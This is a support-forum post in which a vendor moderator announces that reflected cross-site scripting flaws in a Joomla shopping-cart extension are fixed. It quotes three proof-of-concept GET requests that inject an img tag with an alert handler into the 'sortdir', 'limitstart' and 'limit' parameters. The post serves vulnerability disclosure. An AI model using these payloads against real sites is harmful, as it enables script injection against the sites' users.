- Posts: 106
- Thank you received: 10
Joomla MarvikShop ShoppingCart 3.4 Cross Site Scripting
- Support Team
- Topic Author
- Offline
- Moderator
Less
More
8 months 2 weeks ago #2173
by Support Team
This issue has been resolved in Version 4.0 and retroactively in 3.4. Have you found anything else? Please let us know.
Code:
Path: /en/index.php
GET parameter 'sortdir' is vulnerable to XSS
index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=descgt5po<img src=a on-error=alert(1)>vh217
GET parameter 'limitstart' is vulnerable to XSS
index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc&limitstart=0lmefx<img src=a on-error=alert(1)>fe7s7
GET parameter 'limit' is vulnerable to XSS
index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc&limitstart=0&limit=25oj1c5<img src=a on-error=alert(1)>tquly
This issue has been resolved in Version 4.0 and retroactively in 3.4. Have you found anything else? Please let us know.
Please Log in or Create an account to join the conversation.